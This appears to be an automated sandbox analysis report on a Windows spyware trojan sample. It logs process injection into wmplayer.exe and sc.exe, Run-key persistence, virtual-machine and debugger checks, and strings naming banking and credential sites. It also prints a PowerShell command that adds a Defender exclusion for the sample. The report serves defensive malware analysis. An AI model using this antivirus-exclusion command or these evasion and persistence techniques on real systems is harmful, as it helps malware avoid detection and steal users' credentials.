Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@21/32@12/10

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\Microsoft_WMP_70_CheckForOtherInstanceMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1512
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejalo0vz.3ve.ps1

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
Source: C:\Windows\SysWOW64\unregmp2.exe	Process created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Source: unknown	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
Source: C:\Windows\SysWOW64\unregmp2.exe	Process created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD346858D4 push ds; ret	0_2_00007FFD346858D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD3468B86B push eax; retf	0_2_00007FFD3468B889
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34760003 push esp; retf 4810h	0_2_00007FFD34760312
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD347606C9 pushad ; ret	0_2_00007FFD347606E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041C98B push 07E53DEBh; iretd	6_2_0041C990
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004239A3 push edi; ret	6_2_004239AB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041A28D push cs; ret	6_2_0041A290
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004082A0 pushfd ; ret	6_2_004082BC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00403320 push eax; ret	6_2_00403322
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00418BD3 push esi; ret	6_2_00418BD4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00417E4C pushfd ; iretd	6_2_00417E4D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00417F44 push eax; ret	6_2_00417F5D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00401F8C push ebx; retf	6_2_00401F98
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032D09AD push ecx; mov dword ptr [esp], ecx	6_2_032D09B6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035709AD push ecx; mov dword ptr [esp], ecx	13_2_035709B6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E121FD push FFFFFFDCh; iretd	13_2_02E1222B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E10140 push edi; retn EB3Ah	13_2_02E1016F
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E20680 push edi; ret	13_2_02E20688
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E19668 push 07E53DEBh; iretd	13_2_02E1966D
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E1E540 push cs; ret	13_2_02E1E608
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E14B29 pushfd ; iretd	13_2_02E14B2A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E158B0 push esi; ret	13_2_02E158B1
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E1CF89 push esi; retf	13_2_02E1CF9B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E1CF90 push esi; retf	13_2_02E1CF9B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E16F6A push cs; ret	13_2_02E16F6D
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E04F7D pushfd ; ret	13_2_02E04F99
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E11CA0 push ebx; iretd	13_2_02E11CA1
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E14C21 push eax; ret	13_2_02E14C3A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033B9311 pushfd ; ret	13_2_033B9323
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033B9215 push cs; ret	13_2_033B9216
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033B37EE push B012FEBEh; iretd	13_2_033B37FB

Source: C:\Windows\SysWOW64\sc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PTR4CRBH			Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PTR4CRBH			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Memory allocated: 1DF0A230000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Memory allocated: 1DF23BB0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7145	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2323	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Window / User API: threadDelayed 9782	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Window / User API: foregroundWindowGot 721

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\sc.exe	API coverage: 3.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5360	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2864	Thread sleep count: 190 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2864	Thread sleep time: -380000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2864	Thread sleep count: 9782 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2864	Thread sleep time: -19564000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204	Thread sleep time: -37500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204	Thread sleep time: -31000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe	Last function: Thread delayed

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: c23yo28O4.13.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD005-21-t
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: c23yo28O4.13.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: c23yo28O4.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.3948423775.00000000073DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: c23yo28O4.13.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: c23yo28O4.13.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: c23yo28O4.13.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: c23yo28O4.13.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: c23yo28O4.13.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: firefox.exe, 00000015.00000002.2617153702.00000190990FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
Source: c23yo28O4.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: c23yo28O4.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: c23yo28O4.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: c23yo28O4.13.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: wmplayer.exe, 0000000F.00000002.3948423775.00000000072E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000005
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: wmplayer.exe, 0000000F.00000002.3948423775.00000000073B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2v
Source: wmplayer.exe, 0000000F.00000002.3942884266.000000000060A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945109177.000000000164F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: c23yo28O4.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: c23yo28O4.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: c23yo28O4.13.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: wmplayer.exe, 0000000F.00000002.3945969013.0000000005500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00-5-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\Interface\{27354133-7F64-5B0F-8F00-5D77AFBE261E}\P
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wmplayer.exe, 0000000F.00000002.3945969013.0000000005500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00-
Source: c23yo28O4.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2443465756.000002454956E000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2445206793.000002454956F000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2442667644.000002454956E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: c23yo28O4.13.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: c23yo28O4.13.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: c23yo28O4.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: c23yo28O4.13.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: c23yo28O4.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: c23yo28O4.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: c23yo28O4.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00eri
Source: c23yo28O4.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: c23yo28O4.13.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.cs	Reference to suspicious API methods: GetProcAddress(_EE20_0E7E_0670_EE4C_ECB5_EE6F_EEC3_08F8_0658_FE75_EC8D_EE0E_EED3_EE29_061F_EE20_0609_0670_EC98, _EED7_EE62_EED2_EED2_EE36_06E7_08D4_EE79_0EA6_EEDD_08C8_EECC_EEDB_EEBC_0E79_EEFA_0658_EEAB)
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (uint)_EEB7_0E67_EC93_EEA7_0650_08E9_EEDC_EC7A_066B_ECBE_EEFC_08F7_EE31_EE92_0653_08EC.Length, 64u, out var _EC93_065B_EE29_08EE_06E7)
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.cs	Reference to suspicious API methods: LoadLibrary(_EE23_EECD_EE92_EE00_EED9_0E69_EEB8_0E6F_EE1E_EEE6_EE08_EE56_EEC8_EE11_0651_EC7E_0605_08EB(_EE36_EE50_060A_EE59_08E2_EEE7_08E5_0658_EEF6_EE7A_066C_08F7_EEA1_EE16_EE1B_EC9F._EE88_0614_EEF8_EED2_ECAA))

Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
